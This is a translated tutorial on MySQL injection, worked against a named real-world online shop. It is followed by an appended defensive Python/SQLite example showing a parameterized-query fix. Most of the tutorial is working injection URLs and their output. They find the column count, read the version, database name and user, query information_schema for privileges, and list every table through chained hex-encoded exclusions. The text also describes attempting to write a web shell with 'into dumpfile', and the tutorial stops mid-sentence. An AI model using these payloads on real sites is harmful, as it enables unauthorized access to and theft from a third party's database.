MySQL injection instance tutorial

Source: Internet
Author: User
Tags: mysql injection

A worked example of injecting a specific site.

Target site: http://www.babydaily.com.hk/
Injection point: http://www.babydaily.com.hk/newsDetail.php?id=53
First, gather information. Append a single quote and submit http://www.babydaily.com.hk/newsDetail.php?id=53' and the following error is returned:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near at line 1
Two things can be inferred from this error. First, the backend is MySQL; second, either magic_quotes_gpc is on or the addslashes() function is used to escape single quotes, and the former is more likely. Next, check the database version; this matters for a reason explained later. Submit http://www.babydaily.com.hk/newsDetail.php?id=53 and 1=2 union select @@version and the following error is returned:
The used SELECT statements have a different number of columns
The two SELECTs have different column counts; order by resolves this. Submitting http://www.babydaily.com.hk/newsDetail.php?id=53 order by 19 returns a normal page, while http://www.babydaily.com.hk/newsDetail.php?id=53 order by 20 returns
Unknown column 20 in order clause
so the number of columns is 19. Continue with http://www.babydaily.com.hk/newsDetail.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 (changing the id to -1 saves writing "and 1=2"); the page displays columns 2, 14 and 6. Now replace 14 with (select @@version) and submit:
http://www.babydaily.com.hk/newsDetail.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,(select @@version),15,16,17,18,19, which returns the version 5.0.67-community. To get the database name, replace @@version with database(); this returns babydaily_dhost. In the same way, the current connection user is babydaily_dhost@localhost. To list the MySQL users, submit http://www.babydaily.com.hk/newsDetail.php?id=-1 union all select 1,(select user from mysql.user),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, which returns
SELECT command denied to user babydaily_dhost@localhost for table user. The command is denied because the privilege is insufficient. Without administrator privileges, table names cannot be looked up this way; however, from MySQL 5.0 on, the server stores its system information in the information_schema structure, which is why checking the version mattered. Through information_schema, detailed information about the database can be read, for example the current user's privileges. Submit http://www.babydaily.com.hk/newsDetail.php?id=-1 union all select 1,grantee,3,4,5,privilege_type,7,8,9,10,11,12,13,is_grantable,15,16,17,18,19 from information_schema.user_privileges
Return values: babydaily_dhost@localhost (grantee)
NO (is_grantable)
USAGE (privilege_type)
The privilege is minimal (USAGE only), so load_file() cannot be used. I wanted to write a one-line script with select ... into dumpfile (into outfile also works here, but a file written by outfile may mangle or drop some special characters), but after several attempts it always produced a syntax error. So let's just read the username and password from the tables. The table and column names are still unknown, but fortunately information_schema is available. Here is a brief introduction to this structure:
+ ------------- +
| Tables_in_information_schema |
+ ------------- +
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| KEY_COLUMN_USAGE |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+ ------------- +
Here we only pick out the tables that are useful for injection:
| SCHEMATA -> stores the database names
| --> key column: SCHEMA_NAME, the database name
| TABLES -> stores the table names
| --> key columns: TABLE_SCHEMA, the name of the database the table belongs to; TABLE_NAME, the table name
| COLUMNS -> stores the column names
| --> key columns: TABLE_SCHEMA, the name of the database the table belongs to; TABLE_NAME, the name of the table the column belongs to; COLUMN_NAME, the column name
Now let's patiently traverse the table names of the database one by one. After n hours of injection I finally got the complete list; the statement, probably the longest injection statement in history, was:
http://www.babydaily.com.hk/newsDetail.php?id=-1 union all select 1,table_name,3,4,5,table_schema,7,8,9,10,11,12,13,14,15,16,17,18,19 from information_schema.tables where table_schema=database() and table_name != 0x... and table_name != 0x... and table_name != 0x...
// table_schema=database() restricts the listing to tables of the current database; each 0x... is the hex encoding of a table name already found
Because the program escapes single quotes, string values can only be written in hexadecimal or ASCII form; a char() statement would be far too long here, so hexadecimal is used.
Each hexadecimal number is one table_name. Every time a table name is returned, another "and table_name != 0x..." clause is appended to the where condition so that the next one is shown. The final list of table names is:
table_name: {CHARACTER_SETS, COLLATIONS, COLUMNS, COLUMN_PRIVILEGES, KEY_COLUMN_USAGE, PROFILING, ROUTINES, SCHEMATA, SCHEMA_PRIVILEGES, STATISTICS, TABLES, TABLE_CONSTRAINTS, TABLE_PRIVILEGES, TRIGGERS, USER_PRIVILEGES, VIEWS,
cash_points, cate, color, coupon, currency, design_index, email_content, footer, member, news, page, page_manage, pay_manage, points, product, product_color, product_order, product_order_item, product_order_status, product_photo, product_photobanner, product_size, product_video, set_stock, shipping_destination, shipping_destination_profile, shipping_fee, shipping_fee_detail, shipping_method, shopping_email, user}
Here you may say that there is no need to get all the table names, only the administrator table, so why not use a limit clause? It works in principle, but the limit statement is applicable to some
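The root cause this walkthrough identifies (quotes are escaped by magic_quotes_gpc or addslashes(), but the id is spliced into the query as an unquoted integer, so the escaping changes nothing) and its fix, shown as an added example that is not code from the original page or from the site. It uses Python with an in-memory SQLite table standing in for the newsDetail.php news table; the schema, rows and function names are assumptions.

```python
import sqlite3


def make_db():
    # Constructed in-memory database: a news table like the one behind
    # newsDetail.php plus a second table the query should never expose.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    con.execute("CREATE TABLE member (id INTEGER, login TEXT, secret TEXT)")
    con.executemany("INSERT INTO news VALUES (?, ?, ?)",
                    [(53, "Opening hours", "We open at 9."),
                     (54, "Sale", "10% off this week.")])
    con.execute("INSERT INTO member VALUES (1, 'admin', 'SAMPLE-NOT-A-REAL-SECRET')")
    return con


def addslashes(s):
    # Mimics PHP addslashes() / magic_quotes_gpc: backslash-escapes quotes,
    # backslashes and NUL. It only matters inside a quoted string literal.
    return (s.replace("\\", "\\\\").replace("'", "\\'")
             .replace('"', '\\"').replace("\0", "\\0"))


def news_detail_escaped(con, raw_id):
    # Vulnerable pattern from the tutorial: the "escaped" value is concatenated
    # into an unquoted numeric position, so a value such as
    # "-1 union select ..." contains no quote to escape and is parsed as SQL.
    sql = "SELECT id, title, body FROM news WHERE id = " + addslashes(raw_id)
    return con.execute(sql).fetchall()


def news_detail_param(con, raw_id):
    # Hardened: enforce the expected type, then bind the value as a parameter.
    # The driver never lets the value be interpreted as part of the statement.
    try:
        num = int(raw_id, 10)
    except ValueError:
        return []          # not an integer id: nothing to look up
    return con.execute("SELECT id, title, body FROM news WHERE id = ?", (num,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(news_detail_escaped(db, "53"))   # normal lookup works either way
    print(news_detail_param(db, "53"))
```

The same id value with the page's "-1 union select" shape returns rows from the member table through news_detail_escaped() and an empty result through news_detail_param().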
